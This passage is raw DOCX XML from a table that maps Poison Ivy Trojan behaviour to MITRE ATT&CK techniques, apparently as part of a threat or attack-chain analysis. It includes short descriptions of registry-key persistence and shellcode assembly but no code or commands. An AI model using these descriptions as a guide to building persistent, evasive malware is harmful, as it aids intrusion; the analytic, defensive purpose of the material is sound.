                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00593B1C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="404C9D3D" w14:textId="77777777" w:rsidR="00BF7C25" w:rsidRPr="00593B1C" w:rsidRDefault="00BF7C25" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5638F684" w14:textId="46866AFE" w:rsidR="00BF7C25" w:rsidRPr="00593B1C" w:rsidRDefault="00593B1C" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6255F91F" w14:textId="5FD9ABF6" w:rsidR="00BF7C25" w:rsidRPr="00593B1C" w:rsidRDefault="009C415E" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B69F098" w14:textId="77777777" w:rsidR="00BF7C25" w:rsidRDefault="00BF7C25" w:rsidP="00486595">
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r>
              <w:t>The shellcode then creates a string that it uses to create a registry key to automatically run the final payload each time the system starts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17430BEE" w14:textId="5B12C2BF" w:rsidR="00BF7C25" w:rsidRDefault="00BF7C25" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="003777B8">
              <w:t xml:space="preserve">When the system starts up, the persistence registry key will launch the Identities.ocx payload and call its “SSSS” exported function. The “SSSS” function checks to make sure that the DLL is running within the context of a “rundll32.exe” process </w:t>
            </w:r>
            <w:r w:rsidR="00C64366">
              <w:t>…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64366" w:rsidRPr="002D1D50" w14:paraId="16D660A2" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AF72886" w14:textId="34537D6C" w:rsidR="00C64366" w:rsidRDefault="00C64366" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00442F82">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46DA4571" w14:textId="02A12D50" w:rsidR="00C64366" w:rsidRPr="002D1D50" w:rsidRDefault="00C64366" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005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Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EA6D2B2" w14:textId="7C53F71A" w:rsidR="00C64366" w:rsidRPr="002D1D50" w:rsidRDefault="00C64366" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1140 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20EDDDEB" w14:textId="3BC43578" w:rsidR="00C64366" w:rsidRPr="00593B1C" w:rsidRDefault="00593B1C" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00593B1C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60673F62" w14:textId="77777777" w:rsidR="00C64366" w:rsidRPr="00593B1C" w:rsidRDefault="00C64366" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73F78996" w14:textId="7144098B" w:rsidR="00C64366" w:rsidRPr="00593B1C" w:rsidRDefault="00593B1C" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A662A69" w14:textId="3B64D8DB" w:rsidR="00C64366" w:rsidRPr="00593B1C" w:rsidRDefault="009C415E" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C760624" w14:textId="7755CFAE" w:rsidR="00C64366" w:rsidRDefault="00C64366" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] … </w:t>
            </w:r>
            <w:r w:rsidRPr="003777B8">
              <w:t>and then begins piecing 0x141B bytes of data together in the correct order to build the shellcode of the Poison Ivy Trojan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA330B" w:rsidRPr="002D1D50" w14:paraId="356928FA" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BD80F82" w14:textId="5D3D8A63" w:rsidR="00DA330B" w:rsidRDefault="00DA330B" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AD7E2F8" w14:textId="6E42B21A" w:rsidR="00DA330B" w:rsidRPr="00442F82" w:rsidRDefault="00DA330B" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00442F82">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00442F82">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00442F82">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="172AF76C" w14:textId="18B230D8" w:rsidR="00DA330B" w:rsidRPr="0035652A" w:rsidRDefault="00DA330B" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00665981">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">T1573.001 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00665981">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Encrypted Channel: Symmetric Cryptography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6662ADF8" w14:textId="595BF7FB" w:rsidR="00DA330B" w:rsidRDefault="00593B1C" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72B8E4B9" w14:textId="77777777" w:rsidR="00DA330B" w:rsidRPr="002D1D50" w:rsidRDefault="00DA330B" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A2B810C" w14:textId="384540A2" w:rsidR="00DA330B" w:rsidRPr="002D1D50" w:rsidRDefault="00593B1C" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32027C4E" w14:textId="0A820211" w:rsidR="00DA330B" w:rsidRPr="002D1D50" w:rsidRDefault="009C415E" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24679919" w14:textId="27115819" w:rsidR="00DA330B" w:rsidRDefault="00DA330B" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[9] Example initial communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA330B" w:rsidRPr="002D1D50" w14:paraId="64F7C045" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BC220F0" w14:textId="56E73913" w:rsidR="00DA330B" w:rsidRDefault="00DA330B" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="317644E5" w14:textId="5D7E027E" w:rsidR="00DA330B" w:rsidRPr="00442F82" w:rsidRDefault="00DA330B" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00442F82">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00442F82">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0009 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00442F82">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="213DD764" w14:textId="50608A9C" w:rsidR="00DA330B" w:rsidRPr="00665981" w:rsidRDefault="00DA330B" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA330B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DA330B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">1005 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA330B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Data from Local System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C7CD4C5" w14:textId="0A33EA45" w:rsidR="00DA330B" w:rsidRDefault="00593B1C" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BFB614F" w14:textId="77777777" w:rsidR="00DA330B" w:rsidRPr="002D1D50" w:rsidRDefault="00DA330B" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35D0E213" w14:textId="04AEFD43" w:rsidR="00DA330B" w:rsidRPr="002D1D50" w:rsidRDefault="00593B1C" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="297DCC98" w14:textId="5687C78D" w:rsidR="00DA330B" w:rsidRPr="002D1D50" w:rsidRDefault="009C415E" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F660DB3" w14:textId="77777777" w:rsidR="00DA330B" w:rsidRDefault="00DA330B" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[9] Assuming espionage type activity</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A1EA6F4" w14:textId="045015EE" w:rsidR="00DA330B" w:rsidRDefault="00DA330B" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA330B" w:rsidRPr="002D1D50" w14:paraId="718DEA9C" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39A9216F" w14:textId="614163A4" w:rsidR="00DA330B" w:rsidRDefault="00DA330B" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="287463F6" w14:textId="411214C6" w:rsidR="00DA330B" w:rsidRPr="00442F82" w:rsidRDefault="00DA330B" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00442F82">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00442F82">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0009 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00442F82">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="142B9688" w14:textId="79F810B9" w:rsidR="00DA330B" w:rsidRPr="00DA330B" w:rsidRDefault="00DA330B" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DA330B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1074.001</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA330B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Data Staged: Local Data Staging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="673AA1CA" w14:textId="7220A350" w:rsidR="00DA330B" w:rsidRDefault="00593B1C" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F5DC009" w14:textId="77777777" w:rsidR="00DA330B" w:rsidRPr="002D1D50" w:rsidRDefault="00DA330B" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A9D0A8F" w14:textId="692628F3" w:rsidR="00DA330B" w:rsidRPr="002D1D50" w:rsidRDefault="00593B1C" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55AB025D" w14:textId="7605EDD9" w:rsidR="00DA330B" w:rsidRPr="002D1D50" w:rsidRDefault="009C415E" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidR="007566FC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C8691A3" w14:textId="71655427" w:rsidR="00DA330B" w:rsidRDefault="00DA330B" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[9] From above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA330B" w:rsidRPr="002D1D50" w14:paraId="32B1472A" w14:textId="77777777" w:rsidTr="00486595">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EBDEE3F" w14:textId="722C6F43" w:rsidR="00DA330B" w:rsidRDefault="00DA330B" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00442F82">
              <w:rPr>
